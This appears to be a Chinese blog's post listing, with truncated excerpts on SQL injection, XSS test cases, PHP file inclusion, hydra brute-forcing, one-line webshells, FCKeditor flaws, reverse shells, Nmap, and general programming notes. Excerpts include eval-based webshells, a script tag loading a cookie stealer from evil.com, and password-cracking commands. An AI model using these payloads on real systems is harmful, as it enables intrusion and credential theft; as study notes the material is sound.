- 博客(29)
- 收藏
- 关注
RSS订阅转载 SQL注入初探
一,常规注入步骤:1,正常输入2,判断是否存在SQL注入 一般输入单引号判断“ ‘ ”,若服务器未做过滤则说明存在注入。3,判断是数字型注入还是字符型注入 输入“2-1”,若是数字型则返回ID=1的情况。 输入“1’ or '1' = '1”,若返回ID=1的情况说明是字符型注入。4,猜解查询字段的长度 输入“1‘ union select 1,2...
2018-10-19 15:57:00
188
转载 php安全学习笔记
一,LFI(Local File Include)意思是能够打开并包含本地文件的漏洞。相关函数:include(), require(), include_once(), require_once(), file_get_contents()file_get_contents():这个函数就是把一个文件里面的东西 (字符)全部return出来作为字符串。除此之外...
2018-10-17 13:15:00
251
转载 BLE协议分析
一,Bluetooth Low Energy协议基本组成蓝牙系统核心架构可分为三个方面:BLE Application和BLE Host 属于应用层APIHCI(Host Controller Interface)为中间层BLE Controller为底层蓝牙芯片其中在HOST层有的两个比较核心的协议:ATT、GATT1,ATT(Attribute Pr...
2018-09-26 22:21:00
994
转载 调用NMAP批量扫描IP端口
批量扫描IP端口,并将结果导出为由IP命名的文件。假设IPlist.txt文件内容为:127.0.0.1192.168.1.1然后我们获取文件内容IP进行扫描(nmap的”-p-“选项指定nmap扫描从1-65535的所有端口;默认情况下nmap只扫描常见的1000个端口;如果你想要更快的话,可以使用”-F”选项只扫描最常见的100个端口):Windows上的批处理版本...
2018-09-24 10:41:00
5991
转载 安卓系统手机目录
一、文件夹1./acct/ 系统回收站,删除的系统文件。2./cache/ 缓存3./data/ 用户的所有程序相关数据 app/ 所有用户安装的apk文件 app-private/ data/ 每一个应用的数据 com.xx.appname/ 每一个应用的数据都存放在...
2018-09-20 14:28:00
404
转载 xss绕过过滤方法
很多网站为了避免XSS的攻击,对用户的输入都采取了过滤,最常见的就是对<>转换成<以及>,经过转换以后<>虽然可在正确显示在页面上,但是已经不能构成代码语句了。这个貌似很彻底,因为一旦<>被转换掉,什么<script src=1.js></script>就会转换成“<script src...
2018-09-08 20:21:00
275
转载 xss测试用例
1.<script> alert(1);</script>2.<script>alert('xss');</script>3.<script src="http://www.evil.com/cookie.php"></script>4.<script>location.href="http...
2018-09-08 20:20:00
231
转载 python爬虫
正则表达式css选择器xpathxpath是XML路径语言,拥有在数据结构树中查找节点的能力。被开发者当作小型查询语言使用,它通过元素和属性进行导航。requestshttp://f61be319.wiz03.com/share/s/3S6-cp1BIQ952yXKyj02PIM43sCBdM2kcAz...
2018-09-04 10:32:00
167
转载 hydra
破解ftp:# hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV# hydra ip ftp -l 用户名 -P 密码字典 -e ns -vVget方式提交,破解web登录:# hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/# hydra -l 用户名 -p 密码字典 -t 线程 -v...
2018-08-30 00:00:00
187
转载 C++:面向对象
面向对象的特性Abstraction(抽象)Polymorphism(多态)Inheritance(继承)Encapsulation(封装)类的定义class Circle{public: double radius; Circle(){ radius = 1; } Circle(double r){ radi...
2018-08-28 13:21:00
125
转载 C++
引用int x;int& rx = x;引用就是另一个变量的别名动态内存管理c++的内存模型1,Stack(栈):编译器自动分配释放2,Heap(堆):一般由程序员分配释放,若程序员不释放,程序结束时可能由OS回收3,Global/Static(全局区/静态区):程序启动时全局/静态变量就存放于此,程序结束时释放4,Cons...
2018-08-24 21:26:00
105
转载 数据结构:线性表
线性表(List)线性表是n个元素构成的有序序列(a1,a2,...,an)ListMakeEmpty() 初始化一个空线性表LElementType FindKth(int K, List L) 根据位序K返回相应元素int Find(ElementType X, List L) 在线性表L中查找X第一次出现的位置void Insert(ElementType X,...
2018-08-24 15:07:00
145
转载 渗透:WAF&木马
一句话木马asp:<%eval request("heroes")%>php:<?php @eval($_POST[value]);?>asp:<%@ Page Language="Jscript"%> <%eval(Request.Item["value"])%>一句话木马制作:c32:把图片放入里边,...
2018-08-23 09:14:00
177
转载 Fckeditor漏洞整理集合
1、查看编辑器版本/fckeditor/editor/dialog/fck_about.html2、爆绝对路径FCKeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php(支持php的通杀)/FCKeditor/editor/filemanager/bro...
2018-08-23 03:56:00
1005
转载 java面向对象知识(下)
类和子类类定义了类型,子类定义了子类型。子类的对象可以被当作父类的对象使用:子类对象可赋值给父类的变量,传递给需要父类变量的函数,放进存放父类对象的函数里。多态变量Java中保存对象类型的变量是多态变量。“多态”这个术语(字面意思是许多形态)是指一个变量可以保存不同类型(即其声明的类型或任何子类型)的对象。变量的声明类型就是静态类型,变量的动态类型指的是程序运行在某一...
2018-08-16 19:40:00
128
转载 java:字符串
1.怎样比较字符串?用”==”还是用equals()?简单地说,”==”测试两个字符串的引用是否相同,equals()测试两个字符串的值是否相同。除非你希望检查两个字符串是否是同一个对象,否则最好用equals()。如果你知道字符串驻留机制会更好。2.为什么对于安全性敏感的信息char[]要优于String?字符串是不变的,这也就意味着字符串一旦被创建,它们将一直保持在那直...
2018-08-15 13:15:00
103
转载 渗透:信息收集
DNS收集域名 -> IPwhois查询:简单来说,就是一个用来查询域名是否已经被注册,以及注册域名的详细信息的数据库(如域名所有人、域名注册商、域名注册日期和过期日期等)。查出来的信息,比如注册人,邮箱,电话号码还可以继续用于查询同一个注册人注册的其他网站。查询网址:http://whois.chinaz.com/kali工具:dnswalk qq.com....
2018-08-12 22:07:00
141
转载 Eclipse常用快捷键
1几个最重要的快捷键代码助手:Ctrl+Space(简体中文操作系统是Alt+/)快速修正:Ctrl+1单词补全:Alt+/打开外部Java文档:Shift+F2显示搜索对话框:Ctrl+H快速Outline:Ctrl+O打开资源:Ctrl+Shift+R打开类型:Ctrl+Shift+T显示重构菜单:Alt+Shift+T上一个/下一个光标的位置:Alt+Left/Ri...
2018-08-11 23:25:00
168
转载 java面向对象知识(上)
类类的内部封装了方法,用于操作自身的成员。类是对某种对象的定义,具有行为(be-havior),它描述一个对象能够做什么以及做的方法(method),它们是可以对这个对象进行操作的程序和过程。它包含有关对象行为方式的信息,包括它的名称、方法、属性和事件。类的构成包括数据成员和成员函数。数据成员对应类的属性,类的数据成员也是一种数据类型,并不需要分配内存。成员函数则用于操作类的各项...
2018-08-11 23:18:00
100
转载 linux中tar命令用法
-c: 建立压缩档案-x:解压-t:查看内容-r:向压缩归档文件末尾追加文件-u:更新原压缩包中的文件这五个是独立的命令,压缩解压都要用到其中一个,可以和别的命令连用但只能用其中一个。下面的参数是根据需要在压缩或解压档案时可选的。-z:有gzip属性的-j:有bz2属性的-Z:有compress属性的-v:显示所有过程-O:将文件解开到标准输出下面的参数-f是必须的-f:...
2018-08-10 23:14:00
253
转载 linux基础
命令命令的执行依赖于解释器程序(/bin/bash)内部命令:shell解释器的一部分 外部命令:独立于shell解释器之外的程序文件命令行编辑的快捷键:tab:自动补齐\:强制换行ctrl+u:清空至行首ctrl+k:清空至行尾ctrl+l:清屏ctrl+c:取消本次编辑uname:-r查看内核版本 -a查看所有信息hostn...
2018-08-10 23:09:00
93
转载 CentOS开启SSH Server服务
无论是CentOS系统的虚拟电脑还是服务器,始终感觉直接在命令行中操作不方便;比如全选、复制、粘贴、翻页等等。比如服务器就需要在机房给服务器接上显示器、键盘才操作感觉更麻烦。所以就可借助SSH(安全外壳协议)远程操作和管理系统,不仅方便而且安全可靠。 1、登录Centos6.4系统。 示例:使用root用户登录。 注:若为非root用户登录,输入执行某些命权限不够时需加...
2018-08-10 09:29:00
270
转载 linux:netstat命令
netstat命令用来打印Linux中网络系统的状态信息,可让你得知整个Linux系统的网络情况。语法netstat(选项)选项-a或--all:显示所有连线中的Socket;-A<网络类型>或--<网络类型>:列出该网络类型连线中的相关地址;-c或--continuous:持续列出网络状态;-C或--cache:显示路由器配置的快取信...
2018-08-10 09:07:00
126
转载 windows基础知识
目录c:/windows/system32/config/sam ->存放用户名密码 ->可以进入pe修改密码c:/windows/system32/drivers/etc/hosts ->本地dnsc:/用户/用户名/文档/tencent files ->存放QQ数据win+r ->输入“services.msc” 查看服务常见服...
2018-08-09 21:26:00
121
转载 Metasploit入门用法
1、 使用nmap进行端口扫描 2、 使用search命令查找相关模块 3、 使用use调度模块 4、 使用info查看模块信息 5、 选择payload作为攻击 6、 设置攻击参数 7、 渗透攻击 如果第二次看我文章,建议通过以上七个步骤回忆操作,实在记不住再看后面步骤详解,以达到掌握的效果。详解: 首先是安装me...
2018-08-07 10:02:00
156
转载 Linux渗透之反弹Shell命令解析
前言当我们在渗透Linux主机时,反弹一个交互的shell是非常有必要的。在搜索引擎上搜索关键字“Linux 反弹shell”,会出现一大堆相关文章,但是其内容不但雷同,而且都仅仅是告诉我们执行这个命令就可以反弹shell了,却没有一篇文章介绍这些命令究竟是如何实现反弹shell的。既然大牛们懒得科普,那我就只好自己动手了。本文就来探讨一下相关命令实现的原理。Bash...
2018-08-06 10:58:00
185
转载 linux反弹shell命令解析
今天在看spark stream的sample样例的时候看到linux的万金油命令nc。搜索相关的内容突然发现一个很好玩的用处就是反弹shell.下面我们就来讲讲反弹shell1. 什么是反弹shell简单来说就是A主机可以通过执行B主机上的命令并且把返回值都返回到A上。2. 反弹shell的用途这个反弹shell大部分用途是用来侵入别人的主机。就是因为感觉很厉害的样子,...
2018-08-06 10:42:00
147
转载 nc命令用法
什么是ncnc是netcat的简写,有着网络界的瑞士军刀美誉。因为它短小精悍、功能实用,被设计为一个简单、可靠的网络工具nc的作用(1)实现任意TCP/UDP端口的侦听,nc可以作为server以TCP或UDP方式侦听指定端口(2)端口的扫描,nc可以作为client发起TCP或UDP连接(3)机器之间传输文件(4)机器之间网络测速 nc的控...
2018-08-06 10:37:00
453
转载 Nmap笔记
主机发现下列选项控制主机发现。-sL(列表扫描)列表扫描是主机发现的退化形式,它仅仅列出指定网络上的每台主机, 不发送任何报文到目标主机。默认情况下,Nmap仍然对主机进行反向域名解析以获取 它们的名字。简单的主机名能给出的有用信息常常令人惊讶。例如,fw.chi.playboy.com是花花公子芝加哥办公室的 防火墙。Nmap最后还会报告IP地址的总数。列表扫描可以...
2018-08-05 22:28:00
430
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人